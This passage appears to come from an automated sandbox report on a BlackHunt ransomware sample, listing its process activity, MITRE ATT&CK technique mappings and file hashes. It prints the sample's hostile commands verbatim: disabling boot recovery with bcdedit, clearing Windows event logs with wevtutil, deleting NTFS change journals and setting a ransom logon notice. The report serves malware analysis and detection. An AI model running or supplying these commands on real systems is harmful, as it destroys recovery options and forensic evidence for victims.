C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3632
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:7724
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:5200
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:8384
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:15004
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:11356
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8400
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9512
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6220
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:13740
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:13832
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d2f2c09da9b48bde5ed8a1b41ed5a9de
SHA11b8b4e2d0407bde7cc148a66e63a8ac1395db622
SHA2561127a2288883fd979c99b1d27e1c5687665302c15da8532793535c24370c6d64
SHA512ae936ea15c651fbcf38590f8f06536b0204118d9aaf4d64acc44ef64fd6ba0417831a614a96799300a3ba6ea2fa5f3e6992b39dc9127cebd526925f822cdf898
-
Filesize
12KB
MD58b3a22319387bb79312982f0ce8b1d4b
SHA186b5cfeca75b25d4d3a6ed93261294264f973f06
SHA256db6915efc79995e32d19de1c50e9167c739ff01c0a767b51d0b3e910c757de56
SHA5123a35f5ab51d03d9232bffb5318d3451fbc4a7c0c74fa3cfd6369a4c35661d90fc08b5f3c63df8e24ab4720ac436b44ceffcc97252a965d8a70bace22ceb23f61
-
Filesize
684B
MD5ffd6f327197a2ffc2bec3e9be48a3f7a
SHA1b195a0090479e6a41f674248535f983be5240880
SHA2562e746311b621efe59d74cfd7aec59368bd074934bbde9fe037531a83368aca2c
SHA5126898e9a9496f0ded8345623aa8ebffa4ac86c6c8f1f8a3ba601bfaaf97f6b7769b603b38411aaa9f257c8f153c1079a3686162d9966d1225a037b9c28e3a451b